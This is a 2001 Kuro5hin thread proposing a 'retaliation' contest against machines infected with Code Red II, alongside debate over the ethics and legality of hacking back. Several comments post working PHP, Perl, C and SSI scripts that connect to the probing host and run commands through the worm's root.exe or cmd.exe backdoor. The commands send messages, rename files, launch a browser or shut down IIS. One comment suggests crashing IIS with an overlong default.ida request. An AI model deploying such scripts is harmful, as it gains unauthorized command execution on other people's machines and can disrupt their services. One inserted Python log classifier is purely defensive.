Kuro5hin.org: technology and culture, from the trenches

Code Red II retaliation Competition...

By neuneu2K in Internet
Wed Aug 08, 2001 at 12:53:39 PM EST
Tags: Security

I propose a coding "challenge" to all programmers on K5:

Make a script that kills Code Red (I and/or II) infected machines


Inoshiro has posted one in his diary but I do not seem to be able to download it !

The terms of the "challenge" are in this order:

  • should NOT format the drive of the poor S.O.B. or otherwise destroy important data
  • should stop the infection action
  • should inform the poor luser that he was infected
  • should be anonymous (this could be illegal)
  • should patch the server
  • should install
    • (emacs)
    • (a JRE)
    • (perl)
    • (python)
    • (none of the above)

    (Vote in the poll !)

Of course, you do not need to do all this to apply; in fact, a simple script that sends "NET STOP W3SVC" to infected servers is trivial but efficient as a first act !

This post should not be taken as representing any advice to break the law of your community. :-)


Poll
Software to install ?
o GNU Emacs 11%
o Sun JRE 6%
o Perl 8%
o Python 6%
o Other (please comment) 4%
o None, you bastard script kiddiot ! 62%

Votes: 270

Code Red II retaliation Competition... | 156 comments (150 topical, 6 editorial, 0 hidden)
First (informal...) Submissions (3.25 / 8) (#1)
by neuneu2K on Wed Aug 08, 2001 at 06:06:45 AM EST

As Seen in Inoshiro's Diary (some people here do not read Inoshiro's Diary... the pagans !), there is something even simpler than NET STOP W3svc...

hulver said :
You would be better off just sending back a GET default.ida?X where X is any character x 5000. This will cause the Web server to segfault. Unfortunately W2k will just restart it, but it will be without the Codered worm in memory. Until it gets hit again that is.

PS :FIRST POST !


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
PC world [offtopic] (2.80 / 5) (#15)
by garlic on Wed Aug 08, 2001 at 08:39:34 AM EST

So in our more PC world today, more and more insults get taken away from us. Isn't insulting someone by calling them a pagan an insult to people who identify themselves as pagan, like ElectricAngst?

I know I would have been mildly annoyed if you had instead said ... the homos !). Oh well.

HUSI challenge: post 4 troll diaries on husi without being outed as a Kuron, or having the diaries deleted or moved by admins.
[ Parent ]

Grr (none / 0) (#80)
by QuoteMstr on Wed Aug 08, 2001 at 04:59:35 PM EST

It was meant in jest, like the Church of Emacs. :P

[ Parent ]
[meta] I rated you zero because: (3.00 / 2) (#90)
by Inoshiro on Wed Aug 08, 2001 at 06:43:31 PM EST

I don't want to see that first post shit. Leave it at the door. Or take it to where noise is the rule.



--
[ イノシロ ]
[ Parent ]
no problem... (none / 0) (#106)
by neuneu2K on Thu Aug 09, 2001 at 02:34:27 AM EST

I knew the risks :-)
But I think that in a comment with content and noise...
Well I would have rated 1 !
[ Parent ]
Danger Will Robinson!!!! (3.29 / 17) (#2)
by Carnage4Life on Wed Aug 08, 2001 at 06:11:56 AM EST

Please do not do this. I repeat, please do not do this if you don't want to end up like the guy in the story below.

A 'White Hat' Goes to Jail

That is why it is anonymous :-) (3.50 / 4) (#3)
by neuneu2K on Wed Aug 08, 2001 at 06:21:30 AM EST

More seriously, I was not thinking of a worm, only of a retaliating script. I think it is more moral than suing the owners of all the IPs that "attack" my server (Yes, I could do that legally !).

The guy the article you link to talks about is not really a white hat in my book... leaving a backdoor is not the mark of an honorable, security-conscious white hat, and tricking kiddiots into jail is not really moral (I hate these too... but they ARE kids !)
[ Parent ]
Not quite (3.66 / 6) (#4)
by John Milton on Wed Aug 08, 2001 at 06:22:16 AM EST

He didn't just fix the systems. He left a back door into them. That's a little bit different. Besides, there's no harm in creating such a worm. As long as you don't use it, I don't see the problem.


"When we consider that woman are treated as property, it is degrading to women that we should Treat our children as property to be disposed of as we see fit." -Elizabeth Cady Stanton


[ Parent ]
not exactly white hat (4.71 / 7) (#11)
by delmoi on Wed Aug 08, 2001 at 07:44:34 AM EST

That guy installed a back door on the machines he infected. He also wrote a worm, not just a remote disinfecter. What this guy is asking for is just something that would kill the attacking worm on someone else's machine if they tried to connect to you. Which means that they're already trying to hack your computer.

Installing something like a JRE might be crossing the line -- you could screw something up (what if they'd written some m$ dependent java, what if it stopped working?) -- but just removing the worm and popping up a message box letting them know probably wouldn't get you put in jail.

I mean, if you saw a fire in someone's house and ran in to try to put it out, I seriously doubt you'd go to jail.
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
I don't think this will be a good solution (3.10 / 10) (#5)
by BobRoy on Wed Aug 08, 2001 at 06:53:15 AM EST

What gives us the right to break into the systems just because they are infected? This will make us no better than the author of the Code Red worms.

Hopefully the poor sysadmins will soon patch their systems. Even though they should have done it weeks ago.

Even if the admins don't keep their systems up to date, I find it hard to support this kind of action.

If it's wet, Drink it!


Self Defense (5.00 / 1) (#60)
by Sikpup on Wed Aug 08, 2001 at 02:10:28 PM EST

If you are attacked, you have the right to defend yourself. As long as you aren't doing additional damage, you should be ok.

Someone assaults you outside a bar. You can legally defend yourself with force. If you cross the line so that the assailant becomes the defendant, you are in trouble.

So if the parallel holds, defusing the assault is fine, but then using the server to spread further would expose you to the same liability that the server owner currently holds.


[ Parent ]
Here is mine... (4.75 / 16) (#6)
by Scott Robinson on Wed Aug 08, 2001 at 06:53:53 AM EST

Well, here is what is currently running on my web server. All thanks should go to a friend of mine for the initial script/framework:

scott@asuka:/var/www$ cat default.ida
<?php
header("HTTP/1.0 400 You are infected with Code Red II");
?>

<html>
<title>Code Red Alert</title>

<?php
$res = "dirty\r\n";
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);

if (!$fp)
{
    echo "I tried to disinfect you, but couldn't connect: $es ($en)\r\n";
}
else
{
    fputs($fp, "GET /scripts/root.exe?/c+net+send+localhost+\"Your+computer+is+infected+with+Code+Red+2.+See+www.incidents.org+for+instructions+on+how+to+remove.\" HTTP/1.0\r\n\r\n");
    fclose($fp);

    /* every reconnect is checked: the remote IIS may have died or be restarting */
    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
    if ($fp)
    {
        fputs($fp, "GET /scripts/root.exe?/c+explorer+http://www.cert.org/advisories/CA-2001-23.html HTTP/1.0\r\n\r\n");
        fclose($fp);
    }

    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
    if ($fp)
    {
        fputs($fp, "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");

        echo "I tried to disinfect you, and the server started to say:";
        echo "\r\n<h2>\r\n";
        echo $res = fgets($fp, 1024);
        echo "</h2> $SERVER_SIGNATURE";

        fclose($fp);
    }
}

$log = fopen("/tmp/redalert.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

</html>
scott@asuka:/var/www$


I like this one... (3.00 / 2) (#7)
by neuneu2K on Wed Aug 08, 2001 at 07:16:45 AM EST

But, the comments in the reply are NEVER going to be read !

I would add two lines to stop and restart the server (remove the worm from RAM)...
[ Parent ]
Net send winbox 'message' (3.60 / 5) (#10)
by delmoi on Wed Aug 08, 2001 at 07:40:04 AM EST

Will pop a dialog box up on the machine of the user. 'net send localhost' will pop a message box up on the current machine.
[ Parent ]
Ok, let me see if I have this clear: (3.50 / 2) (#12)
by Scott Robinson on Wed Aug 08, 2001 at 08:27:21 AM EST

I'm all for improving my notification:

Instead of my current "c+net+send+localhost+" I should use "c+net+send+winbox+"?

I've also heard of "c+net+send+%MACHINENAME%+"

Scott.


[ Parent ]
no, no, you had it right (4.00 / 2) (#26)
by delmoi on Wed Aug 08, 2001 at 10:43:06 AM EST

My windows machine is called 'takinara' if I did

net send takinara hello

I would get 'hello' on my screen. takinara is the WINS/Samba name of the box, I could also use my IP address or domain name to send the message. The way you had it, with 'localhost' works fine (I tried it), it'll send to the machine that the command is run *on* I.E. the infected machine.
[ Parent ]
net send * msg ? (3.66 / 3) (#32)
by nstenz on Wed Aug 08, 2001 at 11:00:55 AM EST

If I do a NET SEND * "Hello.", I get a message on my screen. I think * might be something like "send to all local users". That works for me. What do you think?

Of course, it is just as easy to use whatever flag in cmd.exe to turn on macro substitution and use the machine name. However, this way saves a little bit of bandwidth... and a little bandwidth to a few hundred thousand machines could be quite a bit in the end. =)

[ Parent ]

Re: Ok, let me see if I have this clear: (3.00 / 1) (#38)
by elemental on Wed Aug 08, 2001 at 11:17:46 AM EST

That should actually be:

c+net+send+%computername%+whatever_message

--
I love my country but I fear my government.
--> Contact info on my web site --


[ Parent ]
Warn the DOMAIN (4.00 / 1) (#94)
by SEWilco on Wed Aug 08, 2001 at 07:30:35 PM EST

It seems like a good idea to "net send %DOMAIN%", so every MS box on the LAN gets a warning. This increases the chance that someone will notice the message, rather than it sitting on the screen of a server in a closet. (In PHP, I think that would be "\%DOMAIN\%")

Also, after the initial socket connection succeeds, change the "dirty" label to something like "warned", so the log shows which ones are likely to have succeeded. Actually, of course, each socket connection attempt should be tested for errors; it's just good programming practice, and particularly relevant when talking to an unstable remote machine.

[ Parent ]

not a good idea (3.00 / 1) (#98)
by janra on Wed Aug 08, 2001 at 09:17:43 PM EST

It seems like a good idea to "net send %DOMAIN%", so every MS box on the LAN gets a warning.

That isn't a good idea, at least when it comes to ISP domains - lately most of my code-red hits have been coming from [MAC address].bconnected.net. (a residential DSL provider) Using your idea would have everybody, even those running windows 95 (i.e., with no services) getting the message, when somebody they know nothing about and can't complain to anyways is the one who is infected.


--
Discuss the art and craft of writing
That's the problem with world domination... Nobody is willing to wait for it anymore, work slowly towards it, drink more and enjoy the ride more.
[ Parent ]
Re: not a good idea (3.00 / 1) (#100)
by Mulad on Wed Aug 08, 2001 at 09:22:30 PM EST

I think that the `net send' commands use Windows NetBIOS names and domains. %DOMAIN% would be the Windows domain, which is usually something very different than the DNS domain. Might also work with %WORKGROUP%, though I'm not even sure if such a variable exists...

[ Parent ]
But! (4.00 / 2) (#13)
by Scott Robinson on Wed Aug 08, 2001 at 08:28:38 AM EST

Wouldn't the first line that stopped the server then disable myself from sending back a message to restart it?

Scott.


[ Parent ]
doh ! (3.00 / 2) (#14)
by neuneu2K on Wed Aug 08, 2001 at 08:34:46 AM EST

you are right of course...
It must kill the server so that it will be automagically restarted (but without the worm...).


On another thread... "net send localhost" is good, since it is executed on the infected machine.
[ Parent ]
at? (none / 0) (#144)
by Jeff Mahoney on Fri Aug 10, 2001 at 06:23:01 PM EST

Windows 2000 includes UNIX-style 'at' as part of the default install. I don't believe WinNT does. If you get a Win2k system, you could schedule an "at" job to run, in say, a minute or so that restarts the web server -- and then shut the web server down. It'll come back up automagically in a minute. :) -Jeff

[ Parent ]
NT+AT (none / 0) (#153)
by b0fh on Wed Aug 15, 2001 at 09:49:23 PM EST

Yes, NT does have an AT engine (the service is called "scheduler"). Sadly, it is usually disabled; it seems that the installer marks its startup as "manual".
--
"Contrary to popular belief, UNIX is user-friendly. It just happens to be selective on who it makes friendship with"
[ Parent ]
Very quick question (3.00 / 2) (#47)
by fluffy grue on Wed Aug 08, 2001 at 12:13:43 PM EST

I've never configured PHP before... how do I get Apache to run this script as a PHP?
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

It depends... (none / 0) (#50)
by neuneu2K on Wed Aug 08, 2001 at 12:55:55 PM EST

Hard way is: recompile apache with php !
Easy way is: Your distribution includes apache preconfigured with PHP :-)... you just drop the file !

I am no php god... So I cannot help you very much :-(
[ Parent ]
Um, see... (3.00 / 1) (#52)
by fluffy grue on Wed Aug 08, 2001 at 01:07:12 PM EST

I did try just dropping it in on my Debian system (yes, I installed and configured the php3 package). I guess I could add a PHP handler for .ida files... not like I need that extension for anything else. :)
[ Parent ]

Okay (4.00 / 1) (#53)
by fluffy grue on Wed Aug 08, 2001 at 01:14:03 PM EST

I just kludged it with AddType application/x-httpd-php3 .ida and that made it work. Whee.
[ Parent ]

anyone wanna help me port this to Perl? (4.00 / 1) (#77)
by Justinfinity on Wed Aug 08, 2001 at 04:52:49 PM EST

running with CGI::* preferably for maximum portability. Heck, get people with patched IIS servers to run it with ActivePerl if possible!

i'm gonna give it a try, but i haven't done that much (any :-P) network stuff with Perl.

find the results on my coding page

-Justin
Why don't you listen to me? If you listen, you get some of that clean, refreshing, new world water.
ok bye
:wq


[ Parent ]
sure... (3.00 / 1) (#102)
by janra on Wed Aug 08, 2001 at 09:38:01 PM EST

But with the same caveats as to my perl skills. I was thinking the other day about how to contact the machines that are filling up my log files, and this seems like a great way to do it.

PS: justinfinity.2y.net isn't responding at the moment...


[ Parent ]
Perl port (4.00 / 1) (#103)
by Count Zero on Wed Aug 08, 2001 at 10:03:16 PM EST

Ok.... Didn't use CGI:: though.

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

# Open a TCP connection back to port 80 on the address that hit us.
sub open_sock {
    my $mysock = IO::Socket::INET->new(
        PeerAddr => $ENV{'REMOTE_ADDR'},
        PeerPort => '80',
        Proto    => 'tcp',
        Timeout  => 5,
    );
    die "Tried to warn you, but could not connect</body></html> $!\n" unless $mysock;
    $mysock->autoflush(1);
    return $mysock;
}

print "Content-type: text/html\n\n";
print <<EOF;
<html>
<head>
<title>Code Red!</title>
</head>
<body>
EOF

# One request per connection, as in the PHP original; HTTP lines end in CRLF.
my $sock = open_sock();
print $sock "GET /scripts/root.exe?/c+net+send+localhost+\"Your+computer+is+infected+with+Code+Red+2.+See+www.incidents.org+for+instructions+on+how+to+remove.\" HTTP/1.0\r\n\r\n";
close($sock);

$sock = open_sock();
print $sock "GET /scripts/root.exe?/c+explorer+http://www.cert.org/advisories/CA-2001-23.html HTTP/1.0\r\n\r\n";
close($sock);

$sock = open_sock();
print $sock "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n";
close($sock);

print <<EOF;
You have hopefully been alerted to the code red infection
</body>
</html>
EOF

# Log the address and time; localtime avoids shelling out to date(1).
if (open(my $cr_log, '>>', '/tmp/code_red.log')) {
    print $cr_log "$ENV{'REMOTE_ADDR'} - " . scalar(localtime) . "\n";
    close($cr_log);
}

exit;


[ Parent ]
doesn't work... (4.00 / 1) (#108)
by janra on Thu Aug 09, 2001 at 03:25:53 AM EST

As nebby pointed out in this comment, the worm's copy of root.exe does not appear to allow shutting down of the server and other neat tricks. I checked this, by trying to access the web server of the computers who had scanned me after I put this script (slightly modified to shut down the server rather than rename root.exe) up and activated it, and they were still up and serving web pages.

Fortunately, there may be an alternative: according to the incidents.org Code Red II page, the worm protects itself from deactivation via an admin simply deleting root.exe by also mapping the C:\ and D:\ directories to server.name/c and server.name/d respectively - so someone can get in via server.name/c/winnt/system32/cmd.exe (or whatever the path is to cmd.exe). I substituted /c/winnt/system32/cmd.exe for /scripts/root.exe and of the three that have hit my script in the few minutes since I changed it, two give me a 'TCP connect failed ... broken pipe' error when I try to hit their webserver. Hopefully that means their webserver is shut down. (Am I right?)


[ Parent ]
my cable died last night (none / 0) (#122)
by Justinfinity on Thu Aug 09, 2001 at 03:03:03 PM EST

so i couldn't update anything. but when i get back from work today (~11 PM EST) i'll take another stab at it

-Justin


[ Parent ]
Hmm. (4.00 / 1) (#101)
by Mulad on Wed Aug 08, 2001 at 09:33:05 PM EST

Well, two things.

First, you should probably only have your script run when you detect that it was triggered by a Code Red II-infected system. Look at the $QUERY_STRING variable and see if it starts with an `X' or three...

Second, trying to send the message to `localhost' will not work. You need to send it to the NetBIOS name of the computer, %COMPUTERNAME%, instead. URL-encode the percent signs and you end up with `%25COMPUTERNAME%25'.

[ Parent ]
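A defender-side counterpart to the scripts in this thread, added here and not written by any poster: it reads Apache combined-format access log lines, separates Code Red I probes (query padded with N) from Code Red II probes (query padded with X, the prefix check Mulad describes) and from follow-up requests to the root.exe / cmd.exe paths janra mentions, and tallies them per source address so the admin can hand the list to the ISP instead of connecting back. The log lines are constructed samples, and the combined log format is assumed.

```python
"""Classify Code Red probes in Apache combined-format access log lines.

Added example (not from any poster in this thread). Constructed sample log
lines are embedded below; nothing here connects back to the probing host.
"""
import re
from collections import Counter, defaultdict

# Apache "combined" format: ip ident user [time] "METHOD URI PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# CRII leaves a root.exe copy under /scripts and maps C:\ and D:\ as /c and /d,
# so later visitors (scanners, the worm's author) probe exactly these paths.
BACKDOOR_RE = re.compile(r'^/(?:scripts/root\.exe|[cd]/winnt/system32/cmd\.exe)$', re.I)

# Constructed sample lines; addresses are from private/documentation ranges.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Aug/2001:06:01:12 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=a HTTP/1.0" 404 284 "-" "-"
192.0.2.44 - - [08/Aug/2001:06:03:40 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN=a HTTP/1.0" 404 284 "-" "-"
10.0.0.5 - - [08/Aug/2001:06:05:02 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
198.51.100.7 - - [08/Aug/2001:06:07:15 -0400] "GET /C/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
203.0.113.9 - - [08/Aug/2001:06:09:00 -0400] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
this line is not in combined format and must be skipped
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(uri):
    """Map a request URI to a probe category, or None for ordinary traffic.

    The default.ida query carries the worm's overflow payload: Code Red I pads
    it with 'N', Code Red II with 'X' (the prefix Mulad's script checks for).
    """
    path, _, query = uri.partition('?')
    if path.lower() == '/default.ida':
        if query.startswith('XXXX'):
            return 'code-red-ii'
        if query.startswith('NNNN'):
            return 'code-red-i'
        return 'default.ida-other'
    if BACKDOOR_RE.match(path):
        return 'crii-backdoor-probe'
    return None


def summarize(lines):
    """Count probe categories per source address; unparseable and benign lines are ignored."""
    per_ip = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        category = classify_request(rec['uri'])
        if category is not None:
            per_ip[rec['ip']][category] += 1
    return dict(per_ip)


def report_lines(per_ip):
    """One line per offending address, busiest first, suitable for an abuse report."""
    rows = sorted(per_ip.items(), key=lambda kv: (-sum(kv[1].values()), kv[0]))
    return ['%s: %s' % (ip, ', '.join('%s=%d' % (c, n) for c, n in sorted(cnt.items())))
            for ip, cnt in rows]


if __name__ == '__main__':
    for row in report_lines(summarize(SAMPLE_LOG.splitlines())):
        print(row)
```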

my script (3.00 / 2) (#105)
by Mulad on Wed Aug 08, 2001 at 11:57:11 PM EST

Here's my script. It doesn't do anything other than a `net send'.

<?php

/* Make sure we're dealing with Code Red II */
if (substr ($QUERY_STRING, 0, 4) == "XXXX")
{
    /* Open a connection to the offender */
    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
    /* Check to see if the connection actually opened */
    if ($fp)
    {
        /* URL-encode the message (spaces become '+', '%' becomes '%25')... */
        $string = urlencode("net send %COMPUTERNAME% WARNING: The Code Red II worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system. Visit http://www.incidents.org/react/code_redII.php for more information.");
        /* ...and send it; HTTP request lines end in CRLF */
        fputs ($fp, "GET /scripts/root.exe?/c+$string HTTP/1.0\r\n\r\n");
        /* close the connection (though it probably got closed automatically) */
        fclose ($fp);
    }
}
else
{
    /* Just for fun and confusion.. */
    header ("HTTP/1.0 404 Not Found");

    /* Standard 404 page */
    echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
    echo ("<html><head>\n<title>404 Not Found</title>\n</head><body>\n");
    echo ("<h1>Not Found</h1>\n");
    echo ("The requested URL $SCRIPT_NAME was not found on this server.<p>\n");
    echo ("<hr>\n");
    echo ("<address>Apache/1.3.19 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
    echo ("</body></html>\n");
}

?>


[ Parent ]
in C (5.00 / 1) (#129)
by ramble on Fri Aug 10, 2001 at 12:41:02 AM EST

/*
Default.ida to warn code red losers.

Step 1: Compile it
most systems: cc -o default.ida default.ida.c
Solaris: cc -o default.ida default.ida.c -lnsl -lsocket

Step 2: Put default.ida in your www root

Step 3: add something like this to your httpd.conf

AddHandler cgi-script .ida
<Directory "/var/apache/htdocs/">
Options ExecCGI
Order allow,deny
Allow from all
</Directory>

Step 4: restart apache.
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>   /* struct sockaddr_in, struct in_addr, htons */
#include <netdb.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>       /* memset, memcpy, strlen */
#include <unistd.h>

/* the request sent back to the infected host; must stay on one line */
const char *netmsg = "GET /scripts/root.exe?/c+net+send+localhost+Your+computer+is+infected+by+the+Code+Red+Worm.+Please+go+to+http://www.microsoft.com/+and+fix+it. HTTP/1.0\r\n\r\n";

int
main()
{
    struct sockaddr_in server;
    struct hostent *hostname;
    char *infected_host;
    int result;
    int fd;

    printf ("Content-type: text/html\n\n");

    /* the web server sets REMOTE_ADDR for CGI programs */
    infected_host = getenv ("REMOTE_ADDR");

    if (infected_host == NULL)
        exit (1);

    hostname = gethostbyname (infected_host);

    if (hostname == NULL)
        exit (1);

    memset (&server, 0, sizeof (struct sockaddr_in));
    server.sin_family = AF_INET;
    server.sin_port = htons (80);
    memcpy (&server.sin_addr, hostname->h_addr_list[0], sizeof (struct in_addr));

    fd = socket (AF_INET, SOCK_STREAM, 0);

    if (fd < 0)
        exit (1);

    result = connect (fd, (struct sockaddr *) &server, sizeof (server));

    if (result != 0)
        exit (1);

    write (fd, netmsg, strlen (netmsg));
    close (fd);

    return 0;
}

Townies On Drugs
[ Parent ]
Re: in C (none / 0) (#147)
by ncc74656 on Sat Aug 11, 2001 at 06:41:15 PM EST

This is what I get when I try compiling it (on an LFS system with Linux 2.4.6):

default.ida.c: In function `main':
default.ida.c:38: storage size of `server' isn't known
default.ida.c:57: sizeof applied to an incomplete type
default.ida.c:60: sizeof applied to an incomplete type

Still a clever idea, though...I tried doing something similar, only with a shell script that called Lynx to do the dirty work. Maybe I had Apache set up improperly; I'll look at that part of your post and see if I can get something going that way.

[ Parent ]

Re: in C (none / 0) (#148)
by ncc74656 on Sat Aug 11, 2001 at 07:23:26 PM EST

Turned out that it was easier to get the job done with SSI than CGI...maybe that's just the way my server is set up. Anyway, if you're already using server-side includes, try this:
  1. Edit your httpd.conf so that .ida is accepted:
    1. search for "AddType text/html .shtml"
    2. skip to the next empty line
    3. add these lines:
      AddType text/html .ida
      AddType server-parsed .ida
  2. Restart Apache.
  3. Create default.ida in your default htdocs directory with something like this in it:
    This server runs Apache. It is immune to Code Red.
    <!--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+is+infected+with+the+CodeRed2+worm.+Please+fix+it+ASAP.%22 -->
That should send out a popup every time an infected server contacts your server.

(BTW, it looks like K5 breaks long lines in posts, just like /. Make sure you reassemble the <!--#exec directive so it's all on one line ending in -->.)

[ Parent ]

"Don't do it" (4.16 / 12) (#8)
by jesterzog on Wed Aug 08, 2001 at 07:30:21 AM EST

Officially I'm always going to say that nobody should do this. Breaking into someone else's machine to fix a problem without asking their permission just seems plain wrong, as several other people have already said in this discussion. I wouldn't want anyone to do it to my system.

Unofficially I have to admit that I'm hoping someone will do it anyway. Either that, or ISPs should be pressured to disconnect customers who aren't doing anything about their excess annoying traffic.

Especially for people living outside the states, Code Red isn't just making the web go slower - it's costing everyone lots of money.

I'm not sure what the standard system is in the states, but where I am in New Zealand the typical high bandwidth pricing system is traffic based, and you have to pay just as much for receiving traffic as for sending it. Because most of the traffic is international (which is where all the good stuff is), the cost is significantly higher than the US and probably Europe.

The consultant guy next to where I work went away for a few days holiday just before Code Red was announced, and came back to a $3000 (about $US1500) ISP bill. Even with patched or unaffected servers it's not good, though. There's also no shortage of people here getting hit several times a second and having to pay for it. It's all adding up, and is pretty bad.


jesterzog Fight the light


you are right about the ISP (2.66 / 3) (#9)
by neuneu2K on Wed Aug 08, 2001 at 07:35:12 AM EST

I asked my ISP to just disconnect the infected servers...
I have had no answer yet...

Remember, technically if your infected server tries (good luck !) to infect my server...

You are breaking the law too !

[ Parent ]
ISPs (4.00 / 2) (#39)
by finial on Wed Aug 08, 2001 at 11:31:01 AM EST

The problem is that ISPs aren't going to take (and haven't taken) the time to disconnect individual infected systems. What they do is a wholesale disable of port 80 (in this case) or whatever it is that is causing the problem. (As discussed on slashdot). That is, they disable it for everyone, infected or not. Not a good solution for anyone.

[ Parent ]
now I am afraid... (3.50 / 2) (#40)
by neuneu2K on Wed Aug 08, 2001 at 11:36:08 AM EST

Very afraid !
The value of my DSL line goes down a lot for me if they block 80 !
[ Parent ]
Cox (roadrunner) has (2.00 / 1) (#51)
by wiredog on Wed Aug 08, 2001 at 12:58:25 PM EST

I think. The story here

If there's a choice between performance and ease of use, Linux will go for performance every time. -- Jerry Pournelle
[ Parent ]
Why not? (none / 0) (#124)
by kimbly on Thu Aug 09, 2001 at 03:57:49 PM EST

Breaking into someone else's machine to fix a problem without asking their permission just seems plain wrong, as several other people have already said in this discussion. I wouldn't want anyone to do it to my system.

Why not? Consider an example from a different domain: There have been several times when I've been walking to my house late at night and come across a parked car with one door slightly open. The interior lights of the car are on because the door is open. I know that if I leave the car alone, it will fail to start in the morning because the battery will be dead. So I close the door. How is this any different?

Consider another example. I live in an apartment building, and once I was walking down the hall and came across an apartment where someone had left their keys in the door. I knocked on their door to let them know this, but they were in the shower. So I opened the door, laid the keys inside on the floor, and then closed the door. I ended up leaving it unlocked of course, but it was practically unlocked before, anyway.

[ Parent ]

I still have mixed feelings, because (none / 0) (#130)
by jesterzog on Fri Aug 10, 2001 at 05:50:10 AM EST

Well the difference from that point of view, at least from my perspective, is that you're not actually closing the door for any server except one of them. Instead you're releasing a viral infection into the air that disperses through the district (or world), shutting any door that it sees. The key point is that it's not under your control.

Actually most of my problem is about releasing a viral type of fix, which isn't necessarily what you're talking about. I'll explain it anyway.

The other problem is that there's no objective notification that people actually want their doors closed. The door might be open, but that doesn't mean Code Red can get it. If it's someone who doesn't trust the provided Microsoft door barricade, they might have instead decided to get a giant, code red eating dog and stash it in the bushes for when Code Red comes along.

The bottom line is that you don't have legal permission to close someone's door for them, as stupid as it sounds. Certainly if you go on a door-closing vigilante romp through town, someone might take issue with you entering their property and "adjusting" it in the light of telling them what's good for them.

Finally, there's still all the traffic problems that it would create for a while, hitting lots of completely secure systems. They would just find it annoying, and might take offence.

I still have mixed feelings about it, anyway. I'm sure it's possible to go on arguing and drawing analogies for both points of view. I don't think it's an ethically right thing to do, but I wouldn't complain much if someone did it.




[ Parent ]
install apache ;-) (2.33 / 12) (#16)
by dof on Wed Aug 08, 2001 at 08:49:01 AM EST

then there would be no problems! :))

dof.
http://www.codepoets.co.uk
I run apache :-) (1.75 / 4) (#17)
by neuneu2K on Wed Aug 08, 2001 at 08:54:26 AM EST

All they are infecting are my logs ...

It is a technical violation of the law... they are "trying" to "hack" my machine, the fact that they can not (not this way...) does not change a lot !


[ Parent ]
me too! (1.50 / 4) (#27)
by jbridge21 on Wed Aug 08, 2001 at 10:48:22 AM EST

Installing Apache would be best.

[ Parent ]
Huh? (3.40 / 10) (#18)
by RangerBob on Wed Aug 08, 2001 at 09:15:19 AM EST

Ok, so we complain about people that spend their time cracking into machines. We also complain about how much bandwidth is wasted because of all the currently infected Code Red machines. So...our solution is to write something that cracks into the machines and wastes bandwidth trying to find them??? While it's a noble idea to want to fix other people's machines, come on. In the end you'd just be doing the same thing you're complaining about in the first place.

The other problem is that, while I hate to say it, you can't help someone become a better sysadmin by going behind their backs and fixing problems for them. If something like this idea did become acceptable, all you'd be doing is encouraging lazy admins because they'd say "Hey, why should I do anything since some white hat worm will fix it for me."

Honestly, I'll admit that a part of me hopes that this worm will continue for a while. I'm finally seeing non-techie types start to catch on that Microsoft products generally are buggy and have security flaws. Non-techies are finally making the connection that Microsoft made both Outlook and IIS, two things that are just security breaches waiting to happen. In the agency I work for, the Dilbertian managers and techs are finally starting to stop their bitching about things like Linux and open source software because of all the recent Microsoft problems. It's also raising awareness about how critical it is to always keep up with your updates.

Err, I do not think they are "admins" (3.75 / 4) (#19)
by neuneu2K on Wed Aug 08, 2001 at 09:19:46 AM EST

Most of the infected machines are home users who installed Win2000 (probably an unlicensed copy) and never used IIS...

Moreover, what I propose is not to hunt down and destroy the infected machines...
Only the ones who "attack" us !

And reading my logs (all I need to find infected machines) does not waste bandwidth, and sending a few kb to a machine to stop it from sending multi-megabytes of XXXXX does not waste bandwidth either !


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Then how are they infected.... (2.33 / 3) (#24)
by RangerBob on Wed Aug 08, 2001 at 10:26:31 AM EST

So how are they infected if they're not running IIS? Wouldn't it be kinda hard for them to be "infected" by an IIS exploit if they're not running IIS? :)

Admittedly, I misunderstood how you intended to find the machines, but I still don't think that it justifies cracking into a machine, even if it's to fix it.


[ Parent ]
they are not knowingly running IIS... (4.00 / 2) (#25)
by neuneu2K on Wed Aug 08, 2001 at 10:35:24 AM EST

Most of the times, it only serves the default IIS page ...
On the subject of cracking their machines... I think it is a lesser evil than leaving open machines on the Internet, ready to DDoS anybody...

Just suppose you are DDoSed by a cluster of about 100000 machines (about the number a normal kiddiot could scan and control in a few hours); these machines would deplete your bandwidth quota in seconds, put you millions of dollars in debt in minutes and then, if your hosting provider is not cool, YOU would go to jail for not paying !

Now, do you think that this is better than forcibly "curing" the infected servers ?


